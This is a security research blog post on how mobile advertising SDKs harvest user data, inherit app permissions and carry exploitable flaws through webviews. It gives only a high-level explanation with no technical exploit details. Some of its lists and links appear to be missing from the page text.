The overwhelming majority of mobile device users resist paying for applications. Therefore developers are particularly interested in experimenting with monetisation through serving advertisements.
It’s not a bad idea either: mobile advertising revenue (for the US) was $31 billion in 2011 and $36 billion in 2012 (source: Interactive Advertising Bureau). Often developers can make far more money using adverts to monetise their applications than by charging a small fee for the software they have developed.
A study by Cambridge University found that:
The future of app monetisation clearly lies in the ad-supported model. So where’s the catch? Isn’t this win/win? Are we really getting something for nothing? Based on the research conducted byMWR, you’re actually paying for these ‘free’ applications.
You may be handing over your address book, giving away the contents of your SMSs, allowing someone to read your e-mails, or in some cases giving away full control of your device. In the very worst cases, all of these things and more! We’ve seen ad networks that:
All of these behaviours are either implemented ‘features’ that are being used and abused, or can be achieved by exploiting resident vulnerabilities in the ad networks Software Development Kit (SDK).
These vulnerabilities and ‘features’ are often available on all of the major platforms, iOS, Android, Windows Phone and Blackberry. However, they are not all exploitable to the same degree due to platform idiosyncrasies, security architectures (such as sandboxing) and platform specific exploitation mitigations.
The way that mobile advertising networks are ‘supposed’ to work is as follows. An advertiser pays a fee for their advert to be shown (in reality it’s actually a very complex pricing model based on a plethora of options, but we’ll try and keep things simple). The advertising network makes available a Software Development Kit (SDK). The SDK is ‘plugged’ into a mobile application by a developer looking to monetise their application. Then when someone downloads and uses the application, the code in the ad network SDK is triggered. The user of the application will see an advert of some kind, and, if the user interacts with the advert in some way, such as watching a video, clicking on a link to view and possibly install another application, or purchase an advertised product, etc., then these interactions are recorded and transmitted to the ad network so that the developer of the application can receive the appropriate payment and the advertiser pays the agreed fee.
So basically, a developer ‘plugs’ in the SDK to their application, gives the application away for free and earns money for every advert shown. What could go wrong? The economics and the associated ecosystem of the advertising world, let alone the mobile advertising world, is a complex beast far beyond the scope of this blog post; so we’ll attempt to simplify it somewhat.
Advertising networks want to maximise their profits, therefore they are always looking for the most advantageous way to achieve this. Advertising networks gather metrics so that they can tailor campaigns and target specific audiences. Advertisers pay a lot of money for accurate metrics and/or successful delivery of targeted advertisements. Your data and meta-data (data about you and your data) are very valuable. They can be sold to 3rd parties and used to deliver more targeted adverts that will increase the likelihood of your interacting with them. Advertising networks are always looking for ingenious ways to profit from the data they collect. In addition to this, advertisers want to deliver the most captivating and ‘feature’ rich adverts. To this end, they look to leverage the mobile devices’ ‘native’ capabilities to do so.
This in itself is not groundbreaking news. The phenomenon of advertising networks stealing your data and leaking sensitive information has been widely reported for some time. Below are just a few links to media articles that have documented this:
So we all know that ad networks are collecting our data, transmitting it insecurely, tracking our movements, profiling us, listening to us and selling on our data to unknown third parties.
It’s worth stating this again: “If You’re Not Paying, You’re The Product”. Those who are already aware of the actions of the advertising networks and have read the articles listed above or similar will probably also be aware (that in some cases at least), the advertising networks have been forced to protect this data from eavesdroppers and to ensure that it is made anonymous to an adequate degree. Those who have been named and shamed have done this adequately. A lot have not.
There are hundreds of ad networks out there, as well as a diverse and expansive eco system; it’s impossible to keep tabs on all of them. Application developers choose the ad network to embed in their application based on how much they can potentially earn. Every search for ad networks will present you with several articles comparing which ad networks provide the highest returns, not which ones leak the least amount of data or perform the least suspicious activities.
MWR’s research expands on the exploration already conducted by journalists and reputable security companies. We were interested in looking deeper into how these advertising networks work and figuring out exactly what is going on under the hood, in an attempt to quantify the risk that ad networks pose to the security of mobile devices and/or the data stored and processed on them. Our research led to some very interesting and hard to digest findings.
During our research we have found that ad networks do a lot more than they advertise, and in fact often display very aggressive behaviours. In addition we have found many ad networks to be vulnerable to classes of threat that could allow attackers and/or malicious 3rd parties to abuse exposed functionality to perform nefarious actions. We have found a number of vulnerabilities in various networks that malicious attackers could exploit to do a number of things you really wouldn’t want. It should be noted that the advertising network(s) are also in a position to exploit the same weaknesses, as indeed could an advertiser who developed an advert and paid the advertising network to display it on their behalf.
In summary, there are a number of parties who can potentially do things they really shouldn’t be able to do to your mobile device and the data it contains via embedded mobile ad networks.
We will be releasing more technical details on each issue with examples of why these vulnerabilities exist, how they can be exploited and importantly, how to identify them for yourself, along with information on the work flow followed by the researchers investigating these libraries. However, within this post we intend to keep things high level.
Most of the exploitable issues identified are present because of how the ad networks and the advertisements interact with the mobile device, in particular how they access the devices’ ‘native’ features. The ad network SDKs require the application developer to display ad content within a WebKit webview. Webkit is an open source web browser engine that powers browsers such as Google Chrome and Apple Safari (the default iOS and Android browsers). An app will use a webview to load HTML content (just like loading a web site in your desktop web browser of choice) and the ad network SDK uses the browser instance to load and display an advert.
The ad network SDK is written in what is known as ‘managed’ code. For Android this is Java, iOS Objective-C, Windows Phone C#, etc., etc.. These are powerful languages that can do many things. The SDKs are closed source. This means that the developer embedding the code into their application doesn’t actually know what it does and can’t look at the source code to find out either. So they are blindly trusting that the code is not doing anything it shouldn’t. In turn, when you install the application from the developer, via the Apple App Store, Google Play Store or Windows Market Place, you are not only trusting that the developer of the application and the code you are installing is trustworthy, but you are also implicitly trusting the code developed by the ad network is also trustworthy.
Additionally, when you install an application, in order to do things such as read/send SMSs, take pictures with the camera, access contacts, etc., it needs to ask for permission to do so. When you install an application that can be used to send a picture taken with your camera to a social network of choice or offer to e-mail it to a friend, it seems a legitimate request to ask for the relevant permissions. However, when you grant these permissions, the ad network also inherits these permissions. Did you really want to give an anonymous 3rd party advertiser access to your photos, or the ability to upload them to your social network? What about the ability to read and send SMSs?
This isn’t to say that all the ad networks are doing this, or embedding the code that is capable of doing this. Some ad networks just contain vulnerabilities that can be exploited in such a way that this can be done. Of course there are ad networks that do include functionality that it is difficult to find any justification for, but we don’t want to cast aspersions on ALL ad networks.
We presented some of the technical details along with demonstrations of how these vulnerabilities can be exploited at the 44CON conference in London. We will also be presenting some of the findings of this research at ZACon in South Africa in November. We also intend to release technical details of the vulnerabilities as and when it is possible. Until then: